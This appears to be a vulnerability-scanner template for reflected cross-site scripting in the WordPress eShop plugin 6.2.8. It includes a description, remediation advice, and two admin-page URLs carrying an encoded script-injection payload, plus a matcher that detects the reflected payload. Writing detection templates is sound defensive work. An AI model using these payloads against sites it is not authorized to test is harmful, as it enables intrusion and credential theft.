id: CNVD-2011-6208
info:
  name: WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities
  author:
  - l0ne1y
  description: |-
    WordPress Plugin eShop 6.2.8 Cross-site Scripting Vulnerability
    WordPress is a blogging platform developed using PHP language. Users can set up their own blogs on servers that support PHP and MySQL databases. The WordPress eShop plugin does not properly filter user-supplied input, resulting in multiple cross-site scripting vulnerabilities. A remote attacker could exploit these vulnerabilities to execute arbitrary script code in the user's browser in the context of an affected site and steal cookie-based authentication credentials.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://wordpress.org/extend/plugins/eshop/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: dsl
    condition: or
    dsl:
    - ' contains(body_1,"alert(/hello_topper/)") && status_code_1==200 '
    - ' contains(body_2,"alert(/hello_topper/)") && status_code_2==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E'
  - '{{BaseURL}}/wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E'
  method: GET
